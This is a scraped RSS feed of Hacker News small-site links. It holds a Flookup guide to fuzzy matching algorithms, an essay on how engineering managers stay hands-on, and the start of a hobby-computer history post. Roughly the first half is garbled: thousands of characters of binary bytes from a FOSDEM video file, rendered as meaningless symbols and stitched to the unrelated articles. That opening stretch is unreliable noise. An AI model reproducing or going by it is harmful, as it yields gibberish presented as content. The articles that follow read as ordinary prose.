œé¤¼¢pšµÍþ(ÿÉxÃ?nƒ±£@Ÿ�52˜0’€ý:@r?.JlJ¼A®9È;ä5þ*pSbU%âq¯!/ð‡!6!Q^äòÿ ÷÷×ç§Øçç§—7·¸ç–¶†×ȧ†×÷è÷È7ØÈH((؇Hhˆ¡'÷øçø(Ø(÷ø('ØX7ø(w혀À€@`@ Üf�6•U8à£@»‚<€øæJãùùièdi8…PÜü]3?ZnéÒóÖÅÄŒ£,ßä¥ÌÔ©ÓfõÂ=÷Åq]ó#ºÇ#¸Lì4FO `΋Wã#ÿ‘KQ=6Y\‘µoÇ6è¾oh&+é“å4ï¡]MG,ºú{÷-è)äMè-ÁB)Wjš©ít¢�XFgóΕ3.ÜôŒÍKÄF£h¡ÞòÆ�ážÎñ.CÝËGn† zAàïÔE¨ê „vyš ÔT³júÁ£@�‚P€ø-ÉÃNñîÞ`?úrÚ»•YU™Ö¸}mÖ Ã}7Eát�®Å.Ý7ñÖée-lÚ†»—�›êñé­#°UÊzþ�sùy•zT6ÃC¼ˆ>cô£é}Ìê•Z¼°>HbÀÌ$¬â¸�;*Ù&"ö7�7'bÒž�´Q%ÃóûAï¸&èXÜÎPZþ»^™ê}ñ£‡�WÈ£@�‚d€ø´ñ48mඪØç—^Ëi¯`Jž-LD‹TûsOUè†9°n©»ì�Öû°kw;‹'VÖ!b·l„aŸš] Ðç"š_j¡›ÀÇî®çnž˜G�­x^[1›\”¨ ÷�˜‚å•´ :&#::‘t�Ôo°°�g|Á‚A jDÿ˜$9[ÓªÉÑý²Q*§ðŠ(ýF|š£C=�x2ª(N$ T@W€ €SbU*á쑽qÏ!ŸñC€/ëŒò ù „(êðîHç�§øW¿¿?=>@¿¿¾¼9½½À?¼¶5·¿?¼¼·@¿ÀÁÀ??¾À>AÀ¿À¿?E9Á?ABE†Á>À???Á>?@Á?¾ÀÁÀ¾À»ÁÀ@Ã?ïDØ&T¦Ä¿x<èUä( ’f<ã‰K;m7±¯Ë�€¥Ój[�T$$ w>¢*—1È¿.èéøA®ê¶¤+Ò!¸�’7-ºb‹É7Mu@îLŒ3#ÇŽO¿a�0°PYÕ¤jc¯žóçž©½ì‚=M.g>e£ÙjØòuÜ!4Ö¢g&\¬=˜�·Ö îö*ÏàHÅŠYù¶qNfN?Ò£–‰+UÎÔw o—Û¨(^'¹3¡¶Ÿ÷$d�6¹à¹/ÜéáUnoË6Ö­$¬˜Ìˆ¹LL¹eR¸’!ŽÉo¸ü j껇\–ÿx]èÓ”Ï|{x°šà™¨4roÆÑ]d«!©7ë+�Yý�Ö?i-í=v› ˜c0€2ê(L( ”¢�ÀPpá7€cbU%â qÎAß!¯ñS›¨‘^ ò ÿ„8±‰ðþHï�§øW¿¾?=¾À??=<:==À>¼µ46¾?¼»¶@@?Á@?@¾À>AÀ@AB?>Å9@¿ÂDÄB?@¿¿@A?¿ÀAÀ@@BÀ¾@¼A¿ÀÄ?êD×LÜêãwмQ‘†‘ò™>!%T¢xÇ”dåßz?’Î/tƒ†….Æk¥Iqp|kU€±–2Õ.ùb¾’m¢­o%5|çÌYbÄùöºv#©$°2œ0– y¨:@xÙ°LlL†K\?’7È;ä5þ*€cbe5⑞A¿!/ð†"C"” äòÿ ÷çÇç·Øç秇7§¨÷–¦†ÇÇ÷—vÇ÷ø(Ø7èÈ7ø88¸‡Hxx è'ø÷ø(Øø8Èh7ø(wýx€À€@`@ ÜdoÔà2±N£@˜‚x€øB5`Ýï{-ÐZ–ï�?‚Ü©wkÛTñú b´gKŒ×ß¾ L<âº:QGá „9ôÖšœksÊ™c½o6fÜ�`(öß³ªµqôõ·h˜DwžÚæ˜<|«‰É¹ŸïÅÜèSÙE|º¹.M›RFªo¢Ü«µ¼Žu ZÇkxï8Ô¯ÎY»Jìr*8QÖòcøáŸÆþ£@�‚Œ€ø™ k]ée\�9½›ÿyI'„-Tƒ'ÿœ6-¼¬6ðÞ!d¢Ö$]=øß>•æìî&BÏÇ%¤oMîùû°½BsA‡ëükJNvÅ¡‹²*ï¯[Ò2xèI¡¸ÛsƇ–e¨î5àÖ_'q±Àj&¤ˆcñIsS¹+Q°Å縲ØëÅ�¨ã˜T_£‡�™è£@Œ‚ €øG•�„û‹åÅŽd•ÒÚð±I¨ýrvð‡BåUM˜ÅpIÓ§ �±Œ¦¶‹÷ ˆs±†XJh¶f¦WGq¾‡M4PXNn—¤ë‰æØ»Ÿ¢¿o•1“¹q7‘ÿËrY[ÿlæ×´×Ó)ô‡T>7’+»5PÄd7 » F‡ONrUó$%9JOŸK‹¬€£@�‚´€øæÓZÊ�›º;±”.Ô–>¼¬Ð¹øqpÜž4¼�ÍY4`šë>Œ[8lªÓmta~Òúfµ�Êcfk�þ|5¤ zý‹E®]ðФg`iÅ0ïû´•õC6iè«ióð&äßzEÁ¦£@î�»2ç0š€}E:@ ð0÷CÆÄÈdµÃú㜃¾C_â¨&6&Q#^!Éäòÿp#b%áþAï!Oð¿~}~{}€~zyszz�~yjim|zwl€€‚}ƒ}€}‚€€‚‚€}‰u€‡‡‰ ƒ€~€‚~€‚‚€„‚{‚v‚€‚‡Õˆ Ê ÷ãùQ<¯ÿ„I™ R¿L©¥��Г°‡uÛ¥éþÛNäÖuéh÷bp�L< ¦²ß¬z6©_FÏ"ã¶·±¹±¡¢ȬÇÿuÅúâ~Šà£@Œ‚È€øåYö~BbI´„À0ŽÐëô«÷×KˆF„³—ê$’ÔAÏ@œ„‘Žßixkpä�t˜ô#€Lj¡¢N ѸN =H? Z–a6Õõç·e R Ié"péŽT•Éäh .ÎñP÷ÏohÞø~êí´ãñÐê—T²6œàíOèG†‡QƒQÕHÕÃÍ£‡�ÜØ£@�‚Ü€øåiÅଞŸ03ã,e#�ÎíAþ9CÊ2Sù‰´ì^¡ËÄ“À¿?½¼9½½À¿<¶57¾¿¼¼¶@¿@ÀÀ@@>À¾BÁ?@C>¾Ä:Á¿ÁDÄ�À¿@À??À¾¿ÀB>¾ÀB?¾À»Á?ÀD¿sDÓ%¾Aàæ"cq| Ý›4Æg¹¿§?áyÿŽÕûǺjp–‚M‰hŒX@Ë5ÎUåÛpm�Ö1G�å•¿Õf%gTÜ—27X½à€X �{½KУ Õø¤³ÛJÀ•õõC&ÛÜv+Cú˜b�~¸<Zï¸jpæÌå7ød1ª8–žõbuÿïFΚ6ì;ŒAš÷˜þÚ"ç$·zȧÁÓHÝWYK&°T×;Îáæb¸‡œ!ᯠ�Lš øIn/¼£àžœ¹ù®†Ê‘À:ãÐ42Ü0ž€{†:@F°JlJ¢D¼A’7®9ä3þ(pcbZáÍqžA¿!/ð…^Éòÿ ÷÷çç§Øç÷LJ7Ǹç–ÆÆ÷ç÷—–ØèØÈ8èG×è—X'øx°ˆ'è÷çø×÷èGçèH؈(—îh€À€@`@ ʯctœòêäóùÿ„a0 ÊùÊŒÃdïDE 4䌎]n˜¥3‚Á^§ãWþWépÝ:¥œŒY­®öÅ^wp@Y%°ãïÒtOñ€£@�‚€øçålõÃÃ@ Tä߀�ôbZJp&Á.aËSÐŒ ÙpÐ`Ð;^¥»QaÉ›=ëZ€Ÿyxq»êTž­zµ*&1#”™&À¦dý)4mf4YĶlNýwé¦Ú¾ñÓ[-\fr­‡Ü¡ô^£"††u “X€àÇŸûaK]!û1ŒpS™8ô?ääöý£@‹‚€øåÎL £wÌ“`<øq޲¢ÔF õ¡Ö¬¶*ƒísN$Bæ{€ë‚T ñ½§B¡=/ß\âAØš=µ.¶Q©Î Õ”’mÆÜ"â]-ÁZ•þý©�¬16÷`þf@Œ9É£ù(�Ì?ïôQ�ºmÊV®!é�•¨wYŠå•ËjŽ1Y%ä'ß°Ûò_ËCÞ¢øcìV(”&ž89aôçO¾þìEñIÍþ™ŽÄžªDzâât¾À¤¡ïhŠío%øìCµXVíѪ˜ˆS$¨]ÌîTï=a�û§�ìyú£‡�aˆ£@¡‚h€ø9W‰$ÌÝL 7^cÎzÙ¼œ ­´aÓÀÞgçÖ GÚº¦�ƒ hî휤’4‡ÈÉÅP%NN…c?s^Ùqs"þNS¼«bҥ̚#+¶>3Ð,×ÖsCˆ¾US͹ē±PóŽáÂ[#Â/ÂBQ»éY@c£�ÛÀ\Ô 7‘ÉBï1 VÄ.E¾üƒ£"¸�€ B«¿Ãsïæ 2ðï L‚ €œùÀp<¦‡@)±*‰ pöHÞ¸ç�Ïø©À͈ë‡5Æyü„¿Â|Ø}Dyxw�wÈSü+ßßßž_`ßÞÞžÞßß^šÚ[Ÿ_Þ^ _à  ߟ _!`Ÿ ¡ßß"  `áâ€àŸ _ߟ Ÿ `ߟà à_ ]à `¡ßøb�€ÝCÑV~mþ@`{ï¢xÙy®uT˜f·l\škÿ:[üÑÊ?fnN¾–ã·ÌêãðÕÐ\+ë°Ãyp¾„̽,žÁ5ÙÑQÏŒ<õ€ �rJKyKQ²8(Lò˜pôñA㇙PÒOJ*fËhç9ÇÆ£øQŸpEœ€ ’ÛôK®˜Â|WÛÂNŸ2¶FzRh*²$ÓW„„Êä9?ÿɈÂè°²FCÿvˆYí÷}mȇc2–×Y¥V+Vá°H ÂXiú>Ü)ï'e^©?ɸ€‹‰Y$ØÄ³‹EK„Wd!Üo=È3’ù…µ‡ ç1jÛ粬C²ƒ±üi2 o–QC~8ü³�¿6 7Eþß=ìKVûéò)ñÊ6;¯4ðt³€Ö¦aô?‹õÝ;"Ûçië»úÒ;䤊ñü`'©R?=¸éWûD•Ë# ¯×yTć£xCùí©ÁŒÏ�­£m• m¹È€ŠÚg…ø…@:¹åkUƾ —o›OqÚ-5ÕE&È7Ò•z¸¤¹§É}ì:Ãs€Sè‹Ê}}ï;ܦ�¥ ,*�i"µÍ¾-‹ß"h˜ƒÃPÉÀ+�7€ËÚS�èžÝqîòùÒ!4PkD× ¡C2¬Tx)àðþÂèïu›móI+´\9º6y¯ma|¢Ò"jÍ{Û‡%¬,=¾ÂØCþvçòhÂ#wlCYçáI¶Ôò©ô/š¤ølò.A7ôG?9MPO<žäÊ$Z8._‘Yð3Ö¥qï³Ç®%JM‡´âx8’o>…èáá™äžMG|€!Í‘HYQˆé-°È¸ ’Ñ«ð†cB,yeˆ‚,èGØ!P½ •a@ŠTœ‹ D¡×J7¼å_o~Á ,Õx‹¤ä&ÒQÐ0OQéâîZïê@¸ÉX݈—<::7¬vš;Ã’«û�Þ0Þg¯€{\å)’ùñŸF x»öà};w rQ,¢Xø Êêõ¹Ãé§7šŽÙá>1ÆGTË#( xد,ÔMà§§¤Ú†0ÕH ÙðåAˆÚÓ“>Ú6búM[}©N·ä¤uÚÿÚo=Gõ*~o)ÿzÀ7 ¤ž’oƵÿž¿eë,v­— bÌ`4ºË¥{ œEÁ,Ÿ)«Ð‚AÔ8xHJ “ùÎ?Ò…Á TÐÂàlF©îm ¤ŒÂ{ƒvØ‹z˜ppìp¬5,¡ÑÞlv wä@ñŽíUÀß§jb¡èÓMÙ�w„Õ¶í"Ýh‹…$/û| �Ä/£h)~5“è ~˜M«èØ"YQs.£m5ø�¼$g¹ák×ÊþgWü¦—±¸¾É}¥:¢Óž2t˜oo-/2�Ù%£Žµ¡û—’§®y>YÛRviŒ_äp;±ûÛì·³À†éí²'£„Êñ×±œéŽì£¬È1…�ˆ¬T€»Õ�%¡Îõ½æAA‹kO‘Ãí¦»_ÜùD`s%Ù4»¾gÄ£Ÿ9»Ô«� Ü€U#DmŒëwŽŸ¸xU‹fG�XøYÿÊ{r^åG2– 2//¤ÑÙ�Ý_€nŽ8^ Bã›p­öIȆÑC‡Þ¿ÒÑl^ŠvÜ›3‚?–8Ô� a4môÕ.ëØ?fÜ®°�¢²®�vêŠ$Õe«ù²F¦U6fî¨èþ�?MÈÐÓ—Ñf0Û™ ¼,¹-˜/z¶�!5Öé Ä¡ÒZ‘£yNmí§‘Î))�Cßßs–„¨qÓôÁ³�ƒCýñ#©)o·òc N¨¢™L‡ÀxÒ°ž*C±/R", s˜_ñÀL¼j—›Ob$H[–*ø·2jWùb²]l^²B—‡¹�­]�cƒÚgFåä¦Ò‘IºœŠ­wç{iîMÁ½:ºÞpl¨Ç¹i8tÏ7‚œÓã¯+èã{,#>—ÖóXUi5}~³ ó¦�`#U{²uZÜP¡0g>¤èdwÈiôŒ�&4ÿãS«`~ôwÏZEº¾˜ß SÛ‚.™ÿW›_ÈS?q2_Á»œk}ÚHãÌ?.ãBÊgÛ^õÚSñÖ^á5‰&‘ò&%f}³Ý³�¬÷¨Âˆ¦2³)ZËSMíÛåò BÏ*±ÃÜ©ü'µ²kë}þåVÇ.³ÜjfÏÊ�RFÃŒ5SäÙ¡hKcD‚Ê”ó¸i8Ÿs(;L¯’…tûˆ� ü듬z¡omôìq½|ßpÇú| ^Qc~Ö$–í—ò±etæÑlM ©Ý�?ЦN«¹¥Ç�-ŒÀ¿¿š~[Ä�0º§ ö#0U·ƒ¼i.­ÑÆzSQá§½CÀ¦—꤃ÖjQQvl“2sØäÞ9ÃcŠ´N<6(6Çy"Ëé……f‰M’á‘÷–2û˜ÿ@ÈRþë†õŠQŠ~¶1¤!«¾¬¦™dq“æ3ßëfäÑ%XàXØ€¤C`'ã`O´ni/HÞIÐaMl[^ŒÂL1®��vbJsdóŠÁv›I-K9†Ü~ÐQÇëÅ3kÐ7•·Æc�ŠÜ9O.LÕ%}{°œ ðV|¡—ÌÀ„‡f“í¿ Æ(-Ai¡P…«­ x—;¾"&tÿiéJá2µ�èÄTûŸýØÆo‚õÃ1È®˜ú æ·Üo-|0Sp³ §:Óð’ç‹Yh¾ï¥µ•Ù}ÚË^ÈŸj'8(ÙÖµÇrø†û!ñÃRBÔµå ^Œ¼3ZÁž4[æ…»�äXQbqe’¾2ßä·¯;Ì�MD[n�íûÒ ‡•$¨öW�žEå\¤Fæñ½ÄZËö�&7|�ÜWj&ù¾i7‹Ð=xk-d˜¡üHÕû¬Ô36¢Ÿÿ)#ÑÌ&h�¡ÿ†¼ xgáF‰¼™ÕÚs£òϽ ª°¬¹Çå`KǀʕwY2À}sÔŸ0lGpÕƒƒ>«—½ùÉLÐÑy”éÎÆs:Ç•*�ûƒžÿB¸•@*œ·”¾³J�M÷Üo�€gÚ*4×C~à?cÝ|ªV£ºÄGJµ ó–‹ðà·�7ÿŒÁæ©ñ®ílÉ‹…ZÑ;¸›7rf§O‚ç'šATU1TÌ䲿ëpO /“©å'—+¯—…U×éï&ÌÙ��b¼Ð«fû ŒÏ’¢n¶ò˜-¦ æèú&ðO`Þ(�ź3ÙN|×ʬe¤ƒN†¦Ë̘÷î¶þ˜(Þh³¸Ÿ9MpâG A7É÷¢¯]'á›!ËÁïRе%ëaœd˜Ð¸�Á*èQ³o"ùcrI)1@oE ñ:çvLó û²e¢5®­ �‚ªÊ©‘R�U†c²—%æîƒ#ö#–n„ÿu/€€}@GÝe š¦ûWÐŒkl~žt%=m¹ü×So79Do¡Šù&Ä(ÆÁr‰<ºñ,fʰ˸¸NFîØÞ3ñiëL˜Âg; W¹!l ;Ñü¯x˜:éÐö²—„LËo¥…ëBäúÒÞ„*=ÕmN2!}µ˜5ßž0ŒX:�þ„Ÿˆ~Ëý\Æ#|yðåÕÜY| Šôi'Œ ÑŒ&Ú¤áßÚû [0$:žc¬wÕº­'a†Ljy)° —o Ó/BS½×yùî=Á[ÞŸ®Oàî 4ž<%w÷ÔsŸ×†5P4H-Û, ©‘—Í´ûòQëà�‡�n›3sa2’€w@@:´þëHc°þç‘ >ù:šlAhgÜ0ñ.ï)ÓRbåb6Î=ìz×�וE£té…Š%m²>üõ]؃K |ýf™0ßhýj w(ãÇN¬ÆÑ¦è¹VÙlLx2µû¸ÖÌfè ´\d¥œ" uÈlÀ1óGδ–RYÿ<Öq7š¨owšë)ÙK‚¼ân¹ä„Ãw}é !—%¼Ž†«R—nÍPšPrH`Oã�ëÎúß®[$¶×ö ¼ËÒ 'R2½†nR¶pT�ê]Gkðäé4­o$¼4Í$_n-{W'Za¬×ÀŸ’èûuæ“hb‹Žnä~J©LSMëÂ(h€24Hø¡T¨·öi��TÌ"ö‚ÙÏ“ÛÍš/ëö|ˆ¹67c={VWjؼFŠH´ºo™_´ƒŠÃvP¼I‰„ÌD‘,O›ëù³ ³V¹Àxg‹ M�Ëö¡±}]›¹9@à`¦$ò¨”.a{§¯þŠ Î¥wH �ó+±ÌàÂïËÑ—I,#±}6õ«€ä?ÿB™Íj÷?¾”&©ÿSS6œåJwÄoOr6 †n•)ñ"˜‡ËàŸ4¨sW1¥îmQÔ­ÇOõ”éœ(Œ:9Ú+L™7¹•^F3Mê.óÒX¨±ËL7ÃNÁ`„OK/ýVíÚ¶´�Uåá .ŽVéBÄ](fšª¬.$ãOibóÿe“ ȶ°ŠŠ2¢­²K‘Ä 1*.λ9%I@ou²† £!›Z®{XE–nÐ~ºsíé… ¬öhÔLÆsÈíÊ>Y¥ÇÐ0…

Article truncated for RSS feed. Read the full article at https://mirror.as35701.net/video.fosdem.org/2025/h2215/fosdem-2025-5972-disrupting-the-destruction-of-our-natural-world-with-openness.av1.webm

]]>
https://mirror.as35701.net/video.fosdem.org/2025/h2215/fosdem-2025-5972-disrupting-the-destruction-of-our-natural-world-with-openness.av1.webm hacker-news-small-sites-43234221 Sun, 02 Mar 2025 19:44:09 GMT
<![CDATA[A Concise Guide to Fuzzy Matching Algorithms and Some Practical Applications]]> thread link) | @ogora
March 2, 2025 | https://www.getflookup.com/documentation/fuzzy-matching-algorithms-explained | archive.org

Fuzzy matching is a technique of finding strings in a dataset, that approximately match strings in a separate dataset, rather than exactly. The discipline of fuzzy matching can be typically sub-divided into two problems: 

  • Finding approximate substring matches inside any given text entry.

  • Finding dictionary text entries that approximately match a specific pattern.

Fuzzy matching is known by several names including fuzzy string matching and approximate string matching. Most fuzzy matching algorithms return similarity scores as percentages to help users gauge how similar the compared text entries are, with a typical scale ranging from 0% for no matches to 100% for exact matches.

Why Use Fuzzy Matching Software?

Data in the real world is often not stored in uniform formats due to the variety of methods used in data collection and processing. This diversity can lead to discrepancies in data entry, such as variations in spelling and formatting. However, these challenges can be significantly mitigated with the use of fuzzy matching software during the data cleaning process.

Fuzzy matching software can aid in identifying and rectifying text-based discrepancies within your datasets. This feature is especially beneficial when dealing with non-standardised data, reducing the number of manual data cleaning operations.

A well-designed fuzzy matching tool eliminates the need for costly and time-consuming tasks such as fresh coding or algorithm development. This allows business users and technical teams to focus their efforts on addressing data processing challenges, rather than being burdened with additional tasks. The use of such a tool not only improves efficiency but also optimises resource allocation.

What Can Fuzzy Matching Software Do?

  • Record linkage: Fuzzy matching software can link closely related records across multiple data sources. This creates a unified identity, providing a holistic view of each entity, be it a customer, product or any other subject of interest.

  • Data deduplication: This software can efficiently merge duplicate records within extensive datasets. This not only reduces redundancy but also improves the accuracy of data analysis and insights.

  • Spelling variation analysis: Fuzzy matching software is adept at detecting and correcting spelling errors, typos, or variations in customer data. This ensures precise search and analysis, enhancing the quality of customer interactions and engagements.

  • Data standardization: This software can link records with abbreviations or acronyms. For example, it can match "Limited" with "Ltd", ensuring a uniform format across the dataset. This standardisation facilitates easier data management and more accurate analytics.

  • Data integration: Fuzzy matching software can consolidate data from diverse sources into a single on-premises platform. This allows for straightforward data sanitation, ensuring that your data is clean, consistent, and ready for analysis.

  • Name variation matching: It can manage variations in names, titles, or prefixes. This ensures accurate customer profiling and personalised communication, enhancing customer experience and satisfaction.

Minimising the Impact of False Positives

  • Set a fuzzy match threshold: Establish a fuzzy match threshold for your particular dataset, a level where anything below will not be considered a match. Values that are too low will increase the likelihood of false positives, while values that are too high increase the likelihood of false negatives.

  • Refine your lookup criteria: Do not just rely on one data point for matching. Consider including other factors like addresses and social security numbers for a more robust fuzzy matching operation.

  • Expert Review: Have a domain expert review the results of the match operation. An expert, with their in-depth knowledge of your data, can be instrumental in developing and fine-tuning the data-matching algorithm, as well as reviewing the results. For instance, if you are matching a school database, consulting someone who understands why certain information might be missing or unrecorded could be beneficial.

  • Quality over quantity: Make sure your main dataset is clean, comprehensive and current. Compromised datasets will always lead to corrupted match results.

Fuzzy Matching in Action: A Real-World Example

Record linkage techniques can be used to detect fraud, resource wastage or abuse. In this story, two databases were merged and compared for inconsistencies, leading to a discovery that helped the U.S. government put a stop to fraudulent behaviour by some government employees:

In a period of 18 months leading to the summer of 2005, a database comprising records of 40,000 pilots licensed by the U.S. Federal Aviation Administration and residing in Northern California, was matched to a database consisting of individuals receiving disability payments from the Social Security Administration, and it was discovered that names of some pilots appeared in both databases.

In a report by the Associated Press, a prosecutor from the U.S. Attorney’s Office in Fresno, CA stated the following:

There was probably criminal wrongdoing. The pilots were either lying to the FAA or wrongfully receiving benefits. The pilots claimed to be medically fit to fly airplanes. However, they may have been flying with debilitating illnesses that should have kept them grounded, ranging from schizophrenia and bipolar disorder to drug and alcohol addiction and heart conditions.

In the end, at least 40 pilots were charged with the crimes of "making false statements to a government agency" and "making and delivering a false official writing". The FAA also suspended licenses of 14 pilots in total, while others were put on notice pending further investigations.

Popular Fuzzy Matching Algorithms

    • Cosine Similarity: It is used to measure the similarity between two strings by representing them as vectors in an n-dimensional vector space. The cosine of the angle between these two vectors is calculated, with a score ranging from 0 to 1.

    • Levenshtein Distance: It calculates the minimum number of single-character edits that are required to transform one word into another. Valid edits are insertions, deletions or substitutions.

    • Peregrine: It is our own fuzzy matching algorithm and it was developed by Andrew Apell. It calculates the percentage similarity between the unique substrings contained in any two text entries.

    • Damerau–Levenshtein Distance: It calculates the minimum number of edits that are required to transform one word into the other. Valid edits are insertions, deletions, substitutions or transpositions of adjacent characters.

    • n-gram: It is a contiguous sequence of n items from any given text entry. It can be a sequence of syllables, letters, phonemes, words or base pairs according to the application.

    • Soundex: This algorithm indexes words by sound, as pronounced in English. The goal is for similar sounding words to be encoded to the same representation so that they can be compared, despite minor differences in spelling. Flookup uses a refined version of Soundex for matching text by sound similarity.

    • The Human Brain: "Aoccdrnig to a rscheearch at Cmabrigde Uinervtisy, it deosn't mtater in waht oredr the ltteers in a wrod are, the olny iprmoetnt tihng is taht the frist and lsat lteteer be at the rghit pclae. The rset can be a toatl mses and you can sitll raed it wouthit porbelm. Tihs is bcuseae the huamn mnid deos not raed ervey lteter by istlef, but the wrod as a wlohe."

]]>
https://www.getflookup.com/documentation/fuzzy-matching-algorithms-explained hacker-news-small-sites-43234078 Sun, 02 Mar 2025 19:32:30 GMT
<![CDATA[Hands-On as an Engineering Manager]]> thread link) | @kiyanwang
March 2, 2025 | https://www.chaitime.chaitalinarla.com/p/hands-on | archive.org

Recently I celebrated a special kind of anniversary. My decaversary (10 years) of becoming an engineering manager and giving up IC life! A question I was often asked, after years of managing and mentoring engineering managers, was:

How do you stay hands-on?

This question pops up in several ways. Sometimes it shows up as feedback to managers that they are “not technical enough." Sometimes it causes “founder mode” vs “manager mode” debates. And sometimes it triggers the “should managers code?” question.

The root cause of all these questions and concerns is the same. Many engineering managers (and their managers) worry about losing touch with tech. They get pulled into things like performance reviews, team planning, status updates, team building, and cross-functional alignment.

“Losing touch with tech” is a real issue for engineering managers. At its mildest, it could confuse or stress the team because the manager might commit to the wrong projects or timelines. At its worst, it could make the manager's skills obsolete. It would be a problem if the manager had to move to another company or team. I've mostly seen it as a problem between two extremes. It shows up as the manager's inability to accurately represent their team or guide them to the most impactful work.

But the solution is not to try to do your eng manager job while also trying to do IC work. This will lead to burnout for you and/or cause unnecessary friction for your team.

In today’s article, I talk about 5 roles engineering managers at all levels can take on to stay hands-on while still adding value to their team’s work.

This was a technique I’d followed often, but it wasn’t until my time at Stripe that I came across the term. It involves thorough testing of a journey. It can be a user journey in your product or a developer journey in your workflow. Then, write down your experience. Capture what worked and what didn’t. Also, include clear recommendations to make the journey better.

I recommend doing this exercise periodically on developer journeys. It will help find where your team is facing friction. Then, you can make development easier and faster. Expanding this exercise beyond your team's circle can create a wider impact. You may discover friction affecting more developers than just your team.

Should engineering managers friction log user journeys? Or is that a thing for product managers only?

If you want to advance in your career, you must wear many hats and swap them often. At Stripe, I logged friction for our new embedded components' platform integration. I was able to see how things were from the platform’s perspective through an engineering lens. This helped us all - eng, product, GTM, and more - understand how to make this experience better!

Most engineering teams have many KTLO (keep-the-lights-on) tasks. These take time from other work. A long-term look at KTLO categories will reveal useful insights. You can use these insights for high-impact work.

In the early days of Google Compute Engine, I did a KTLO analysis. It found we weren't releasing every week as we thought. We had many rollbacks, so it was more like “2 steps forward, 1 step backward." The causes of these rollbacks revealed a few themes. We could use them to improve our release cadence. This, in turn, unlocked a major business milestone. A faster release cadence resolved 20% of our technical deal blockers (TDBs). These were features that were blocking new deals.

Here are some more examples of KTLO analysis I've done in the past:

  • A biannual analysis of our production incidents helped my team gain insights into reliability, leading to investments in projects like fault-tolerance testing and upstream performance testing.

  • Analysis of bugs reported in the last 3 months revealed our "bug factories," which helped us focus on those areas during design and code reviews.

One more thought on why undertaking KTLO analysis is high-value work. Most engineering organizations suffer from what I call the “infra project suspicion." It is often unclear what business needs "infra projects" will meet. These projects are technically dense, long-term, and preventive in nature. An example of an infra project would be “improve our release cadence." In contrast, "feature projects" have a clear goal: implement this feature. It is often easier to match this to business needs. KTLO analysis helps you support “infra projects” by linking them directly to business goals. In my example, it took almost a year to improve our release cadence. But, mapping it to the revenue it would unlock via the TDBs helped us allocate resources and keep our GM's support.

I highly recommend being part of your team’s on-call rotation! A few ways this will help you and your team:

  • You will stay connected to the vital parts of your system. You’ll feel what breaks often and recognize what has the biggest impact.

  • If you are plugged in, you can provide air cover to your team during on-call emergencies that get escalated.

  • You can also give praise when your team manages important issues well and recognize them for projects that stop potential breakage.

  • You likely have the least bandwidth on your team. If the team's docs and runbooks don't help you during your on-call, you can take back learnings on how to improve them (see the Archivist role below).

  • If the on-call experience frustrates you, it frustrates your team too. Or, they may have grown used to it, which could be a problem (normalization of deviance). Treating on-call as a type of friction logging journey will help you make it more efficient for your team.

I have to mention one more reason for being on-call as an engineering manager.

In my early days as an engineering manager, I had taken on a new team of 5 engineers. We were in charge of a critical developer infra used by 1000+ engineers at the time. All my team members complained to me about how intense and demanding their on-call was. I was curious to experience this time sink myself to figure out if I could reclaim some or part of this time for my team.

On my first day on call, I received 23 chat pings. They were all questions about using our infrastructure. The answers were already in our documentation! After the fifth such ping, I wrote a short message like this - “Hi! Thanks for using FooBar. Please visit <link> where you will find our quickstart guide and FAQs to help you get started.” I copy-pasted this message to all the chat pingers for the rest of the day. It was enough to solve their problems. The next day, I added a blurb to our on-call page. It said users should try the quickstart guide and the FAQ links before pinging the on-caller. After that update, I got no pings for the rest of my on-call shift with no noticeable drop in usage or quality of our infra.

As an engineering manager, you have a superpower. You can say no on behalf of your team. You're probably more comfortable doing it than they are. My team was being courteous. We were providing white-glove service to every user. This led to intense on-calls. I switched us to a more scalable approach. It did require saying no to many folks, both directly and indirectly. But it helped us reclaim valuable time. We spent that time improving our offerings. This provided greater benefits to our customers compared to our white-glove onboarding.

Ask any engineer, and they will tell you their #1 problem is documentation. Eng docs are always in need of updates, and there are always better ways to write them. A well-functioning eng team also creates many other docs. These are in addition to design docs and user documentation. Postmortems for incidents. Regular updates for project milestones. Quarterly retrospectives for OKRs. Monthly business review updates. And more. There may be training docs from tech talks, brown bags, and other training sessions.

You can and should create some of these documents yourself. Most eng managers already do this. I’m not talking here about being a document writer; I’m talking about being your team’s archivist. The dictionary definition of an archivist is “a person who maintains and is in charge of archives." You are the only one who can play this role. As the team manager, most of the documentation likely comes to you. You don’t have to read it all, but cataloging and organizing it will be super valuable to your team!

You can take advantage of the advent of LLMs to analyze your archives in a significant way. As an example, one simple thing I did out of habit was to move all relevant docs of a type into a Google Drive folder. So all weekly ops review decks would be in a folder, for example. When Gemini became available in Google Drive, I could ask it all sorts of questions about my ops review data, which spanned weeks!

My lack of hands-on experience was acute at Stripe. I had "grown up" at Google, from IC to EM to Director. At Stripe, I directly stepped into a senior role. I did not have the experience of actually building and shipping code there!

I was fortunate to get the flexibility to do an “Engineerication” in my first 90 days at Stripe. An “engineerication” is a portmanteau of “engineering” + "vacation," but it is NOT a vacation! Regardless of your view on the "managers should code" debate, I HIGHLY recommend this approach for quickly learning tech in a new domain. Especially if you learn by doing, this will help you a lot more than reading docs or code.

All the activities I mentioned could be part of Engineerication. However, writing, submitting, and deploying actual code is a key part of Engineerication that isn’t included in those activities.

Here are a few tips for planning and going on a successful engineerication:

  • Choose bite-sized tasks. I asked around for ideas suitable for first tasks for new junior engineers or interns and got quite a few good choices.

  • Choose tasks that are not in the critical path. You don't want your team unable to ship a key feature because your one PR was pending while you were off doing other manager-y things!

  • Choose representative tasks. It's easy to think, "My team uses Ruby, so I'll just do this Ruby tutorial for engineerication." But that misses the true goal of engineerication. The goal is to work in your team's codebase. Do a task someone on your team would do. This will give you a deeper understanding of how things work.

  • Be vulnerable. If you’ve followed the above tips, it is very likely your tasks are intern/new-grad shaped. You are going to run into issues working on them. And when you do, you’ll likely have to ask the junior team members for help getting you unstuck. Set your ego aside and enjoy the process of learning from them. Reverse-mentoring is a gift. It can help you gain knowledge and connections you'd otherwise miss.

  • Beginning, middle, and end. You must prioritize your engineerication. to make it meaningful. I found it helpful to have a clear start, middle, and end. This way, I could stay accountable. The junior team members also felt that I valued their time. This also let me limit my engineerication. I could then wrap it up and move on after my timeline or milestones finished.

Readers, what are your tips and tricks to stay hands-on in a management role?

Discussion about this post

]]>
https://www.chaitime.chaitalinarla.com/p/hands-on hacker-news-small-sites-43233824 Sun, 02 Mar 2025 19:09:28 GMT
<![CDATA[From ACS to Altair: The Rise of the Hobby Computer]]> thread link) | @cfmcdonald
March 2, 2025 | https://technicshistory.com/2025/02/22/from-acs-to-altair-the-rise-of-the-hobby-computer/ | archive.org

[This post is part of “A Bicycle for the Mind.” The complete series can be found here.]

